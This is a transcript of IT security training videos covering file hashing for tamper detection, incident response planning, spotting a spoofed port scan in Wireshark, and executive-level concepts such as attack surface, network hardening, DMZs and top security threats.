displays a table with three column headers: Algorithm, Hash, and Path. The
Algorithm column has the values, SHA256, for all the rows. The hash column
header has the values,
62BC9ADF78D284822208F008ED68093059FF2AD61BE9332EC21AFB77A6480
CA7,
3CE6684FB884479C530D7234C561C31ABD30FAD1AAD9E072EB1DF907286E
F2F1, and
9DAA77C982FDC73C79C5E55670F0DF88517B3D33178F4FFA5C47616CD6A9
5AAF. The Path column header has the values, D:\work\Projects_Sample_Files,
for all the rows. The prompt does not change. [Video description ends]
Now, what I'm going to do is make a change to the Project_A.txt file. I'll just use
Notepad to do that. Then we're going to come back and run get-filehash again to
see if any of the hashes are different. So I'm just going to run notepad here. And I'm
going to run it against project_a.txt.
[Video description begins] He executes the command: notepad project_a.txt. The
Project_A.txt file opens. It displays the text, Sample text. The prompt does not
change. [Video description ends]
And I'm just going to go ahead and make a change to the file. So maybe I'll just add
Changed in the first line, and I will close and save files. So the Project_A.txt file
that has been changed, we can agree on that. So I'm going to use my up arrow key
to go back to my command history. And once again, I'm going to run get-filehash
against all files in the current directory.
[Video description begins] He executes the command: get-filehash *, again. The
output displays a table with three column headers: Algorithm, Hash, and Path. The
Algorithm column has the values, SHA256, for all the rows. The hash column
header has the values,
89814AB289AE01A11FC7CEFD1574E469B0DF0DB4C64DD8ED84A365F5AFB
D4F28,
3CE6684FB884479C530D7234C561C31ABD30FAD1AAD9E072EB1DF907286E
F2F1, and
9DAA77C982FDC73C79C5E55670F0DF88517B3D33178F4FFA5C47616CD6A9
5AAF. The Path column header has the values, D:\work\Projects_Sample_Files,
for all the rows. The prompt does not change. [Video description ends]
Notice for the first entry, Project_A, you can't really see the file name, it's off the
screen. But notice that the hash originally began with 62BC9.
[Video description begins] He highlights 62BC9 of the value,
62BC9ADF78D284822208F008ED68093059FF2AD61BE9332EC21AFB77A6480
CA7, in the Hash column of the table displayed in the output of the previously
executed command: get-filehash *. [Video description ends]
And it no longer begins with that, why? Because the file contents have changed, it's
not the same file anymore. But notice that the other file hashes respectively for the
Project_B and Project_C files have remained the same.
[Video description begins] He highlights 89814 of the value,
89814AB289AE01A11FC7CEFD1574E469B0DF0DB4C64DD8ED84A365F5AFB
D4F28, in the Hash column of the table displayed in the output of the command:
get-filehash *, which is executed again. [Video description ends]
And the reason for that is because they have not been modified.
[Video description begins] He highlights the values:
3CE6684FB884479C530D7234C561C31ABD30FAD1AAD9E072EB1DF907286E
F2F1, and
9DAA77C982FDC73C79C5E55670F0DF88517B3D33178F4FFA5C47616CD6A9
5AAF, in the table displayed in the output. [Video description ends]
So file hashing can definitely be useful if we want to detect whether something has
been tampered with or changed since the original hash was generated.
Incident Response Planning
[Video description begins] Topic title: Incident Response Planning. The presenter
is Dan Lachance. [Video description ends]
We've all experienced at some point what it's like to be ill prepared for a situation,
it's not a good feeling. And so this is what incident response planning is all about,
planning ahead of time.
[Video description begins] Incident Response Planning [Video description ends]
So it's proactive planning for IT security incidents, in terms of what will our
response be when these negative things happen. Now, these occurrences could be
network outages, could be host downtime, perhaps due to hardware failures or a
malicious user compromise of that host. It could be a malware outbreak, could be
an incident related to cybercrime, or sensitive data loss. Either way, we want to
make sure that we've planned for all of these items ahead of time. Often, the
incident response planning, and you can have more than one of these for different
aspects of systems and data within the organization.
Often these plans stem from a business impact analysis that was already conducted
previously, when we determine what the negative consequences are of threats being
realized against assets. The recovery time objective or the RTO is an important
factor to consider when it comes to incident response planning. This is set by the
organization and normally it's measured in minutes or hours and it relates to a
specific system. We're talking about the maximum amount of tolerable downtime.
So for example, if server 1 is a crucial server that is used to generate revenue or
something along those lines.
Perhaps we've determined that the RTO for server 1 can be no more than 2 hours,
otherwise it has unacceptable negative consequences against the organization. The
other factor to consider is the recovery point objective, the RPO. This one deals
with the maximum amount of tolerable data loss. So for example, if we determine
that the company can afford to lose up to a maximum of 24 hours worth of a
specific type of data, then that would be the RPO. And that would dictate then, that
we have to take backups of data at least once every 24 hours. The incident response
team is a collection of people that should know what their roles and responsibilities
are when incidents occur such as, who are the first responders?
And who do we escalate to, if we have an incidence that occurs and it falls outside
of our skill set or our legal ability to do something about it. Who do we escalate to?
This needs to be known ahead of time and not during the confusion of an incident
actually in the midst of occurring. Well, how are we going to make that work? It's
actually very, very simple. We need to put aside some time to conduct periodic
drills related to negative incidence occurring, so that we can gauge the
effectiveness of the incident response plan and people, that ideally hopefully will
know their roles. There should be a periodic review related to the results of those
periodic drills. Maybe there needs to be more training provided, and maybe more
frequent drills, to make sure that people know exactly how to respond when
negative incidents occur. When an incident response plan needs to get created.
[Video description begins] Creating an Incident Response Plan [Video description
ends]
And remember, this is just specific to a business process, or an IT system
supporting a business process or a subset of data. So you're going to have a lot of
these incident response plans. The first thing you do when you create it, is identify
the critical system or data that the response plan pertains to. Then, identify threat
likelihood against that asset. Identify single points of failure which might be as
simple as having a single Internet connection when we rely on data stored in the
public cloud. We then need to assemble the incidence response team, and then
create the plan.
[Video description begins] Incident Response Planning [Video description ends]
Now, the incident response plans will contain procedures, specifics for how to
recover from negative incident, such as system recovery steps, or data restoration
procedures. And it might also specify which tools should be used such as disk
imaging tools or alternative boot mechanisms, perhaps, which might be used to
remove infections of malware on a machine. It can't be removed when the machine
is booted normally. Tools could also include things like contact lists that incident
responders would use when they need to escalate.
Examine Network Traffic for Security Incidents
[Video description begins] Topic title: Examine Network Traffic for Security
Incidents. The presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll examine network traffic, looking for security incidents.
That can kind of feel like looking for a needle in a haystack if you're doing it
manually. And in this example, we will do it manually. We're going to use the
Wireshark free packet capturing tool to examine some packet captures.
But certainly, there are appliances, whether they're virtual machines or physical
hardware devices, that you can acquire, that will do a rigorous, detailed network
analysis looking for anomalies. Often though, you're going to have to feed it what
is normal on your network, a security baseline, before it can determine what is
suspicious. So here, I've got a packet capture taken previously.
[Video description begins] The Wi-Fi window is open. It is divided into six parts.
The first part is the menu bar. The second part is the toolbar. The third part
includes the Apply a display filter ... <Ctrl-/> search box. The fourth part contains
a table with the column headers: No., Time, Source, Destination, Protocol, Length,
and Info. The No. column header includes the values: 1196 and 1197. The Time
column header includes the values: 9.557259 and 9.557402. The Source column
header includes the values: 1.1.1.1 and 192.168.0.20. The Destination column
header includes the value: 192.168.0.9. The Protocol column header includes the
value: TCP. The Length column header includes the value: 58. The Info column
header includes the value: 38283 -> 80 [SYN] Seq=0 Win=1024 Len=0
MSS=1460. The fifth part includes the statement: Transmission Control Protocol,
Src Port: 38283, Dst Port: 80, Seq: 0, Len: 0. The sixth part includes 0000 9a de
d0 a9 d9 39 18 56 80 c3 68 ba 08 00 45 00 .....9.V ..h...E. [Video description ends]
And this is something you might do periodically, kind of like a random spot check.
Just start packet captures on networks where you're allowed to do that, save the
packet capture files for later analysis. You might simply go through them out of
interest because it is very interesting. But at the same time, you might also look for
things that perhaps shouldn't be on the network, protocols that shouldn't be in use.
Or maybe rogue hosts that were not there and now are showing up. So here in
Wireshark, as I manually peruse through this packet capture, I might come across
things that look suspicious, such as IP addresses that don't normally fit the profile
of what is on our network.
[Video description begins] He scrolls through the table. [Video description ends]
For example, here I've got a source IP address of 1.1.1.1, where my subnet is
192.168.0.
[Video description begins] He points to the 192.168.0.20 value in the Source
column header. [Video description ends]
Now, that is not to say we shouldn't have any traffic outside of our subnet. Perhaps
the subnet does allow traffic from other locations. However, the other thing to
watch out for is to filter when you find something that you might think is
suspicious. So for example, maybe here, a filter for 1.1.1.1.
[Video description begins] He types 1.1.1.1 in the Apply a display filter ... <Ctrl-/>
search box. [Video description ends]
Now, notice that when I try to type that into a percenter, I have a red bar, nothing
happens. Well, that is because I have to tie that value to a specific attribute. So for
example, ip.addr equals 1.1.1.1.
[Video description begins] He alters the 1.1.1.1 value in the Apply a display filter
... <Ctrl-/> search box to ip.addr==1.1.1.1. The No. column header includes the
value: 1142. The Time column header includes the value: 9.332956. The Source
column header includes the value: 1.1.1.1. The Destination column header includes
the value: 192.168.0.5. The Protocol column header includes the value: TCP. The
Length column header includes the value: 58. The Info column header includes the
value: 38282 -> 80 [SYN] Seq=0 Win=1024 Len=0 MSS=1460. The fifth part
includes the expandable section: Ethernet II, Src: IntelCor_c3:68:ba
(18:56:80:c3:68:ba), Dst: HewlettP_67:13:0e (34:64:a9:67:13:0e). The sixth part
includes 0000 34 64 a9 67 13 0e 18 56 80 c3 68 ba 08 00 45 00 4d.g...V
..h...E.. [Video description ends]
So Wireshark has its own little syntax. Now we can see that we've filtered out the
list and we're only seeing 1.1.1.1.
[Video description begins] He highlights the 1.1.1.1 value in the Source column
header. The fifth part includes the expandable sections: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: HewlettP_67:13:0e
(34:64:a9:67:13:0e), Internet Protocol Version 4, Src: 1.1.1.1, Dst: 192.168.0.5,
and Transmission Control Protocol, Src Port: 38282, Dst Port: 80, Seq: 0, Len: 0.
The sixth part includes 0000 34 64 a9 67 13 0e 18 56 80 c3 68 ba 08 00 45 00
4d.g...V ..h...E. [Video description ends]
And if we select one of these packets, we can then start to break down the packet
headers here.
[Video description begins] He expands the section: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: HewlettP_67:13:0e
(34:64:a9:67:13:0e). It contains the text, Destination: HewlettP_67:13:0e
(34:64:a9:67:13:0e) Source: IntelCor_c3:68:ba (18:56:80:c3:68:ba) and Type:
IPv4 (0x0800). [Video description ends]
Where, in the Ethernet header, we can see the source and destination MAC
addresses, the hardware addresses, the IP header, Internet Protocol.
[Video description begins] He expands the Internet Protocol Version 4, Src:
1.1.1.1, Dst: 192.168.0.5 section. It includes the text: 0100 .... = Version: 4 ....
0101 = Header Length: 20 bytes (5), Flags: 0x0000 Time to live: 51 Protocol: TCP
(6). [Video description ends]
Where we could see things like Time to live, the TTL value which is normally
decremented by one each time the transmission goes through a router, so it doesn't
go around the Internet forever. There are other fields too in the IP header, but here
in the TCP header, we can see the Destination Port here is 80.
[Video description begins] He expands the expandable section, Transmission
Control Protocol, Src Port: 38282, Dst Port: 80, Seq: 0, Len: 0. It includes the text,
Destination Port: 80. [Video description ends]
Now what is suspicious here is from that same address, it looks like it's trying to hit
TCP port 80, okay? It's trying 192.168.0.2. Same with 0.3, trying to get to port 80,
0.5, port 80, okay.
[Video description begins] He points to the values, 192.168.0.2, 192.168.0.3, and
192.168.0.5, in the Destination column header. [Video description ends]
What this is telling us is someone is conducting a port scan or some kind of a
network scan against those hosts for the same port number.
[Video description begins] He selects the value, 192.168.0.7, in the Destination
column header. The fifth part includes the expandable section: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: Sonos_13:31:9c
(94:9f:3e:13:31:9c). [Video description ends]
That is not normal in that small period of time to have the same source IP scanning
for the same port number or trying to make a connection to that port number.
Something is going on here. And at the same time, we might take a look at 1.1.1.1
and look at the source MAC address.
[Video description begins] He expands the section: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: Sonos_13:31:9c (94:9f:3e:13:31:9c).
It includes the text, Source: IntelCor_c3:68:ba (18:56:80:c3:68:ba). [Video
description ends]
Now, of course, it's easy to forge or spoof source IP addresses as well as MAC
addresses.
[Video description begins] He points to the text, Source: IntelCor_c3:68:ba
(18:56:80:c3:68:ba). [Video description ends]
You'll see more forged IP addresses more often than you would see MAC
addresses, but let's just take note of this Mac address, 18:56:80:c3:68:ba. Okay, I'm
going to keep that in mind for a second. Now as I start looking through here and
trying to draw correlations, notice here that down here where the destination that is
been probed 192.168.0.13.
[Video description begins] He selects the value, 192.168.0.13, in the Destination
column header. The fifth part includes the expandable section: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst:
IntelCor_c3:68:ba(18:56:80:c3:68:ba). It includes the text, Destination:
IntelCor_c3:68:ba (18:56:80:c3:68:ba) and Source: IntelCor_c3:68:ba
(18:56:80:c3:68:ba). [Video description ends]
Notice, its MAC address is the same as the probing machine.
[Video description begins] He highlights the text, Destination: IntelCor_c3:68:ba
(18:56:80:c3:68:ba). [Video description ends]
What is going on here? So what this is telling me is that we've got a network scan,
and that the person conducting the scan is attempting to hide their true identity with
IP address spoofing.
Exercise: Auditing and Incident Response
[Video description begins] Topic title: Exercise: Auditing and Incident Response.
The presenter is Dan Lachance. [Video description ends]
In this exercise, the first thing you'll start with is to list three security auditing best
practices. After that, you will distinguish between vulnerability assessments and
penetration testing, because those are not the same things. Next, you'll explain how
multi-factor authentication can enhance security. And finally, you'll list the steps
involved in creating an incident response plan. Now is a good time to pause the
video, and to think about each of these four bulleted items, and then afterwards you
can come back to view the solutions.
[Video description begins] Solution. Security Auditing Best Practices. [Video
description ends]
There are many security auditing best practices including the use of unique user
accounts. By users having their own log on credential set that aren't shared amongst
other users, we have a way to track which users' activities were performed by that
person. And so therefore it's got accountability for actions. We can also select event
auditing that we want to audit. Instead of auditing all events, we can be much more
judicious in our choices so that we'll only be notified of items that actually have
relevant impact. We can also use the storage of audit logs on a central logging host.
This way, if a device or a host containing audit logs itself is compromised, and
those logs are wiped or they're tampered with, well, we've got another central
location where we've got a copy of those. And often, that central logging host is
very much hardened, so protected from attack, and it's also stored on a protected
network.
[Video description begins] Vulnerability Scanning/Penetration Testing [Video
description ends]
Vulnerability scanning is considered passive, because what we're doing is scanning
a host or a range of IP addresses or an entire subnet looking for weaknesses.
However, when weaknesses are identified, that is as far as it goes. Normally,
vulnerability scanning won't cause a service disruption. Probably the worst thing
that could result from conducting a vulnerability scan would be setting off alarms.
Because you're scanning devices as a malicious user might do during the
recognizance phase of hacking. So we can set off alarms, we should be aware of
that.
Penetration testing is a different beast altogether because it's considered active.
Because it not only can identify weaknesses, but it actually takes steps in an
attempt to exploit those weaknesses. And depending on the weakness in question, it
can actually cause a service disruption for a specific system. So it's important then
that when we are conducting penetration testing, either through internal or external
security auditors, that specific pen test dates and times are set, so that we know
when this is going to happen. You probably don't want a live, active penetration
test against a crucial business system during the height of when that system is
required for business productivity.
[Video description begins] Multifactor Authentication [Video description ends]
Multi-factor authentication, or MFA, uses at least two authentication categories
such as something you know, perhaps like a user name and a password. That is two
separate items but they're both only one category something you know, along with
something you have. Maybe that would in the form of a smartphone where you're
being sent a unique code. And the combination of having the phone and that code
sent to it, along with the name and password, will allow you into his system. So
multi-factor authentication then is certainly more difficult to crack than if we were
using single factor authentication, such as simply knowledge of the user name and
password.
Creating an indecent response plan begins with first identifying what it is that we
want to be able to effectively respond against in terms of realized threats against an
asset. So we have to identify critical systems and/or data. Then we have to look at
what the likelihood is of threats against those systems and data actually occurring.
Then we need to identify and mitigate, ideally remove single points of failure. Then
we need to assemble a team that will be part of the incident response plan that will
know their roles and responsibilities when certain incidents occur. And finally, we
can go ahead and create the plan. Incidents response planning is crucial in today's
technological environments which are drawing so vast and complex, and at the
same time having so many possible threats against them.
An Executive's Guide to Security:
Understanding Security Threats
Companies that do not understand threats facing their information are at risk of
costly data breaches. In this 13-video course, learners can explore common security
threats, types of network attacks, and the human element of security threats. Key
concepts covered here include what an attack surface is, and how it must be
understood to protect corporate information; and what network hardening is and
how it relates to protection of corporate information. Next, learners will examine
network demilitarized zones and how they protect corporate information; observe
differences between threats, vulnerabilities, and risks in corporate environments;
and study top kinds of security threats facing organizations today. Continue by
learning the role that physical security plays in protecting corporate data; how
social engineering is conducted and how it is mitigated through corporate policy;
and the importance of corporate security policies, and why they should be strictly
adhered to. Finally, explore the importance of password policies and why they
should be adhered to; and learn reasons why IT administrators need to protect an
organization by refusing to bend rules.
Course Overview
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, I'm Jamie Campbell. With almost 25 years under my belt as an IT consultant,
marketing and communications expert and professional writer, I'm a technology
enthusiast with a passion for gadgets and a flare for problem solving. I've worked in
the IT, publishing and automotive industries and I'm also an accomplished web
designer.
Additionally, I've been a technology instructor, I write for various tech blogs, and
I've authored and published four novels. Breaches of company information are
reported on a regular basis. And it has never been more important that companies
protect their information. Organizational leaders must lead the charge.
But it's often a challenge to understand the risks and security principles designed to
keep an organization safe. Companies that don't understand the threats facing their
information are at risk of costly data breaches.
In this course I'll discuss a variety of common security threats, the different types of
network attacks, the role physical security plays in the protection of corporate data,
and the human element of security threats.
Understanding the Attack Surface
[Video description begins] Topic title: Understanding the Attack Surface. Your host
for this session is Jamie Campbell. [Video description ends]
In this video I'll discuss what an attack surface is and how it must be understood in
order to protect corporate information. You may have heard the term attack surface
or the term attack vector and these two terms generally define, for network
administrators, and a network's vulnerability.
When we speak about attack surface, what we're describing is the total combined
nodes, users, devices and any entry points of a software environment, network
environment and business environment. In other words, the attack surface
represents all possible vulnerabilities for a network. To better understand the attack
surface, it helps to visualize what it might look like.
[Video description begins] A diagram displays illustrating an example of an attack
surface. The diagram is arranged in three concentric rings. The inner ring shows
an office, a system of nodes, and a server. The middle ring has routers, a system of
nodes, and servers. The outer ring shows servers, a system of nodes, mobile
devices, laptops, and applications. [Video description ends]
We have many different ways to access company network information today,
beginning with the internal servers and workstations. Those have been around for a
while now. But we have other vectors, and that's the other term you need to know,
with each vector increasing the size and scope of an attack surface. This can
include things like remote workers and remote offices, apps and data in the Cloud,
devices that employees use in the course of business, so phones and tablets. Each
new attack vector presents a risk and a challenge, and IT administrators need to
ensure that these vectors are secure in order to protect a network.
As I mentioned, there are several kinds of attack vectors and they can be broken
into lots of categories. For the sake of simplifying things, let's break them down
into four general categories. First is software. Software is an absolute necessity for
getting work done. But it's risk lies in the fact that there's an almost unlimited
amount of vendors creating an almost unlimited amount of applications. While
companies have learned over the years to lock down what users can and cannot
install inside a company's firewall. Things have gotten more complicated in the past
10 years or so.
The network of course, is an attack vector. It's how hackers and unauthorized users
try to gain access to the information secured behind the firewall. Mobile devices are
the new threat really. Because while administrators can relatively easily define
what software users can and cannot install. It becomes significantly more difficult
to control what apps are installed on phones and tablets if those devices are
personal devices that employees use to connect to the company network.
And then there's the physical attack vector which for the sake of simplification
represents every door, server room, wireless router, network access point and
internal computer connected to a company network.
Generally attacks come in two forms. The first is passive where a hacker monitors a
network's activity and scans for vulnerabilities on that network. Because it's just
watching and not actively trying to penetrate that network, it's not always obvious
that they're there. The purpose of this kind of attack is to recon the network and its
activity often with the intent of developing an attack plan.
Active attacks on the other hand go further with hackers actually gaining access to
and perhaps modifying information either by burrowing in through a vulnerability,
an attack vector. Or intercepting information that comes out and goes out to the
network.
So why is the attack surface such a problem for organizations? Well, the surface
has been growing for a while now thanks to advances in technology. 20 years ago,
you had servers and workstations, internal network access points, and that was
pretty much your attack surface. Today, we have numerous new kinds of entry
points, like wireless routers, for example. We have new kinds of devices that
connect to an organizational network, tablets and phones, for example.
In addition to all that, we're seeing more sophisticated hacking tools. There are
actually tool kits that you can purchase on the dark web, making it relatively easier
for people who aren't hardcore hackers. And new kinds of exploits, the tricks and
methods used by hackers to gain access. Then there's BYOD, bring your own
device. Many companies have realized that it's next to impossible to stop people
from bringing their personal phones and tablets to work.
And in fact, recognized an opportunity to give those devices connectivity for two
basic reasons. First, because it saves money, now that's up for debate, but I won't
get into that here. You don't have to give them a work phone is the basic idea.
Second, it can add to productivity because employees won't be tethered to their
desks. However, as I've discussed, personal devices have greatly increased the
attack surface. Especially when employees don't pay much attention to the apps
they're installing.
Network Hardening Explained
[Video description begins] Topic title: Network Hardening Explained. Your host
for this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the importance of network hardening and how it relates to
the protection of corporate information. So what is network hardening? Well, it's
lots of things, but let's start with a quick definition of attack surface because we
need to understand that and why networks are vulnerable. An attack surface is all
the nodes, users, devices and entry points, all the vulnerabilities of a software
network and business environment. It's every potential entry point for a hacker.
In network hardening, we utilize multiple techniques to ensure that the network is
as secure as possible. Minimizing the risk associated with all the entry points. This
is a multitiered procedure using techniques like strong password policies, ensuring
the software is secured, patching software vulnerabilities, securing network ports,
utilizing intrusion prevention systems. Having strong malware detection software
and hardware, dealing with stale and outdated accounts, and reducing the amount of
unnecessary software and services. Essentially, you're hardening the network's
defenses by mitigating the common attack vectors and having active defenses
against attacks.
Some of the common holes in a network that we target for network hardening
include open network ports. Network ports are used for communicating in a
network, both internally inside the network and externally out to the Internet. For
example, when you use a web browser to surf the Web, you're using port 80 or port
443, the latter being for secure encrypted connections.
Different kinds of software use different ports and many of them are for legitimate
uses. Then there's old or discontinued software. This represents a sizable challenge
for network admins because we sometimes need old legacy software, and
organizations often move slowly to update to newer software, operating systems,
for example. The problem is compounded when you're talking about hundreds or
thousands of systems in an organizational network. Same with unpatched software.
There used to be a time not long ago when you waited for the next release of an
application or OS, and it could be months or even longer.
Now, depending on the vendor, we're seeing software updates on a weekly basis for
a couple of reasons. First, bandwidth allows us to do that, but more than that,
software development isn't perfect. And vendors, when they detect new
vulnerabilities or security risks want to get the patches out to their installed base as
soon as possible. But there also has to be a procedure to ensure that new software
patches don't break functionality.
Recently, a major software developer pushed out an update to its OS and within a
matter of days, some frustrated users were reporting that the update had deleted
their personal files. That's an extreme example but it did happen and organizations
often want to test an update to make sure that it won't disrupt employees in their
work activities. And another common hole is Wi-Fi routers.
Wi-Fi has been with us in a useful manner for 20 years or so. And add to that the
sheer number of wireless devices that people bring to work, and you have a
headache for admins. Not just that, but many organizations offer guest Wi-Fi for
visitors to their business. So that represents a major attack vector that needs to be
part of the network hardening process.
Generally, there have to be two basic roles in the network hardening process. The
first is the admins, the people who actually perform the hardening. They identify
security holes in a number of ways, ranging from the very obvious, like locking
down unused network ports, and installing firewalls and malware detectors. To
more active and aggressive forms of network hardening. One of those methods is
something called penetration testing or pen testing for short. Pen tests are
simulations of hacking attacks where IT professionals actively try to break into a
network to identify security gaps and lock them up.
On the other hand, an IT admins sometimes forget about this group as a way of
helping to secure a network, but there's the users. Some admins may regard users as
the problem, but users are on the frontline. They're in the trenches everyday doing
recon if you will. So they're a valuable resource because if they're properly trained
to recognize potential security gaps, they can advise an admin when they detect a
problem. This kind of advocacy is important but not all organizations recognize the
importance of keeping their employees informed and making them realize that they
have a vested interest in protecting the network too.
Now let's focus for a moment on other issues surrounding network hardening,
specifically some of the things that good network admins want to keep on top of
and employees need to be aware of.
The first is something called zero-day vulnerabilities or simply zero-day. This
refers to a phenomenon where a security hole exists, but the people who need to
know about that potential exploit, the software developers, the security people and
the admins aren't aware of it. This is when the clock starts ticking thus zero-day.
When a hacker, if they were aware of the hole, could walk right in so to speak
because there was a hole there and no one knew about it.
Virus definitions, these are updated all the time because of things like zero-day
exploits where security companies recognize a new virus or a potential hole and
release updates to close the holes. Antivirus software definitions need to be updated
regularly for this very reason.
Software bloat, have you ever purchased a new computer or a phone and found all
sorts of software on it that you didn't ask for? It could be a free trial of antivirus
software. It could be a free trial of some sort of marketplace. I'm sure you've come
across it because it's everywhere. Software bloat is a phenomenon that can
represent a real network hardening problem. Because network admins don't want to
deal with all sorts of software they didn't ask for. They can bug down the system
and most of us don't have the time to assess each application to ensure that it
doesn't pose a security risk. Software bloat is a thing.
Poor password policy, this is a headache for everyone. People hate having difficult
to remember passwords, and they hate having to remember yet another password.
But trust me, there's a good reason for strong password policies. Long gone is the
time when you could enter five or six numbers for a password and expect the
account to be safe from things like brute force attacks which use share CPU power
to repeatedly try passwords until the correct password's been found.
And I'll end with the attack surface, and the sheer amount of new attack vectors.
This represents a big issue for security admins because where we used to have one
device for every employee, a desktop or a laptop computer. We now have two,
three, four, devices for every employee with each one connecting to the
organizational network. We're seeing this kind of exponential growth in the number
of possible attack points. And that makes network hardening even more difficult,
and more important in the here and now.
What is a Demilitarized Zone?
[Video description begins] Topic title: What is a Demilitarized Zone? Your host for
this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss network demilitarized zones and how they can help protect
corporate information. You may have heard the term demilitarized zone or DMZ.
And when we talk about DMZs we're not talking about soldiers from opposing
nations putting a safe boundary between them, where no activity occurs. But that's
where the term comes from. So what is a network demilitarized zone?
Well in networking, a demilitarized zone is a logical space or gap between the entry
point to a network the firewall and the outside world and the network itself. The
idea is to provide a barrier between the outside world and an organization's
sensitive information.
This is a basic graphic that helps explain what a DMZ is and how it works. On the
left half side we have the outside world, the Internet, including a phone to represent
external devices, even if they're physically present in the building. Then we have
the cloud and the laptop to represent remote users. Just to the right of that group
there's the firewall, the guardian of the network. You have to get through that in
order to access a company's network. On the far right we have the internal network,
the LAN, with servers and workstations that are physically plugged in to the
network. Notice that there's a firewall just to left of that as well and that space in
the middle is the DMZ. They are the Wi-Fi routers and servers.
In this example, one for email and one is for a web server. And here we have file
folders with arrows showing the flow of traffic in two directions. So this area in the
middle provides access for users and that could be company personnel working
remotely. It could be suppliers, could be customers. They have access to certain
things. The customers, for example, wouldn't be able to access that mail server, but
maybe they can access your website there in the DMZ.
But all the sensitive information, the important stuff to an organization is secured
behind that second firewall, the one on the right. There's no specific rule that states
what you can and cannot put in the DMZ. More often than not, it's common sense.
It's just a matter of deciding what and how much you want to put in the DMZ.
Because while it's still secured by a firewall, it is directly accessed by the outside
world, that is the Internet. A DMZ is also known as a perimeter network because it
provides a sort of perimeter.
Generally speaking, DMZs can be physical or logical, meaning that you could
cordon off a DMZ to a separate physical location or have the perimeter set up on
the same servers. Essentially it's a barrier that makes it more difficult for attackers
to gain access to sensitive information. And it separates the untrusted, the Internet,
from the trusted, the internal network, the LAN.
Now here's another way of looking at DMZs. We have the Internet, which is and
rightly so untrusted, but it's also necessary to do business in the modern world. We
need to be able to access that Internet. We need to be able to give others access via
the Internet. On the other hand, you have your network which is a trusted place
where all your important information is stored. Sometimes it needs to be accessed
though from the outside, employees who travel for example.
We need to be able to provide them access to what they require in order to do their
jobs. So the DMZ acts as a space in the middle that can satisfy that need without
putting the network on the right at risk from the network on the left. As I
mentioned, it's up to whomever designs the DMZ to determine what kind of access
is provided.
[Video description begins] Let's look at the Demilitarized Zone Common
Services. [Video description ends]
Generally, you'd have website access, access to email. FTP, File Transfer Protocol
is usually a common service on a DMZ. Database access might be provided and
services like VoIP, Voice Over IP, could be placed on a DMZ.
Threats vs. Vulnerabilities vs. Risks
[Video description begins] Topic title: Threats versus Vulnerabilities versus Risks.
Your host for this session is Jamie Campbell. [Video description ends]
In this video, I'll describe the difference between threats, vulnerabilities, and risks
in a corporate environment. When we talk about network security, especially in
organizational environments like a company network, there are three terms we tend
to use to layout the problems so we can figure out how to tackle it. Those terms are
threats, vulnerabilities, and risks.
And there's a distinction between the three that every stakeholder needs to
understand, if we're to help them understand why it's so important to protect an
organization's information from outside risks. I find this diagram helps to pare
down the terms. We really have two elements to be concerned with, threats,
vulnerabilities. Where they intersect is where the third element, risk, lies.
Understanding that relationship on an organizational scale will help create a culture
of risk prevention.
[Video description begins] A graphic displays. It shows a Venn diagram depicting
the relation between the threat and vulnerability. The point of intersection is
denoted by risk. [Video description ends]
So, threats are the potential sources of danger, the things that we network admins
worry about every day. Vulnerabilities, on the other hand, are the potential things
that can be exploited. The security holes that we need to identify and close. And the
risk is the asset that can be lost or compromised. If A, the threat, leverages B, the
vulnerability, to get to that asset.
Threats come in many forms, they can be intentional, so your proverbial hacker
trying to find a way into your network. They can also be unintentional, so, for
example, an employee that does something that causes harm. I'll use the example of
failing to lock a computer at the end of the day. They can come in the form of
natural disasters, earthquakes, hurricanes, thunderstorms, and so on.
And they could be the result of force majeure, things that occur either through some
sort of error or at random like power outages. Some examples of vulnerabilities
include security policies, which are great to have, but only as good as the policy
itself. Security infrastructure could pose an opening for hackers if it's not been
properly established. The old example of a backdoor, for example, whether it's
intentional or unintentional.
The backup policy, which is crucial for disaster planning. If you're not backing up
your data on a regular basis, there's a vulnerability there, because lost information
costs. Whether an organization has a disaster plan. Has every contingency been
thought through? You have to be ready for everything.
And then how to deal with ex employees, whether they left voluntarily or
involuntarily. How do you go through and scrub the footprint that they left behind?
That could be security codes, passes, email accounts, network access accounts and
so on, and so on. And all that takes us to risk, the result of threats times
vulnerabilities.
[Video description begins] Risk Explained [Video description ends]
Risk requires thorough assessment and planning. Every company understands risk,
or at least it should, but how well an organization understands and deals with risk
often comes down to planning and teams. Ask yourself this, in the event of a
disaster, intentional or otherwise, does every person in your organization know how
to react, or will they be hobbled sitting and waiting for someone to tell them how to
react?
That in no small part comes down to policy. If it hasn't been written down in a clear
and unambiguous manner, there may be a problem. On the coattails of that is the
fact that things change, particularly in the tech world. And a policy is not and
should never be a document that's signed off on and then placed in the cabinet to
collect dust. It's a living, breathing document that needs to be revised on an
ongoing basis.
Top Security Threats
[Video description begins] Topic title: Top Security Threats. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the top kinds of security threats facing organizations
today. There are lots of threats to a company's information and we have plenty of
real world examples of that. But there are specific threats worth considering
because these are currently the top security threats to organizations, so let's take a
look.
We start with Malware, a catch all term that upon closer examination means much
more. Social engineering is a term that refers to using people to gain access.
Unpatched software is an ongoing threat. And then there's BYOD, bring your own
device and its younger sibling IoT, the Internet of Things.
Generally speaking, these are the top four security threats to organizations today.
As I said, Malware is a catch all, a broad term that refers to software designed to do
bad things, in some cases to compromise systems and steal information.
But Malware is also used to cause mayhem and wreak damage. It's always at the
top of the list because Malware grows and gets more dangerous as hackers learn
new tricks. Social engineering is used by hackers to build relationships with people
on the inside or take advantage of a situation where people are involved.
Sometimes it's employees who unwittingly give up information. Sometimes it's
methods that hackers use to take advantage of a situation.
And there's a methodology to it too, dumpster diving, where a hacker goes through
an organization's trash to find information that may help him gain access to a
network. Or shoulder surfing where someone looking over your shoulder might
glean a password or account name. Social engineering can get quite sophisticated
perhaps taking months or longer. Software that goes unpatched represents real
threat.
Zero day exploits appear and the clock begins to tick. Someone identified a flaw in
a piece of software for example and while that flaw remains unpatched, it is a
threat. Or in the case of many organizations, they have a working system and don't
want to mess with it.
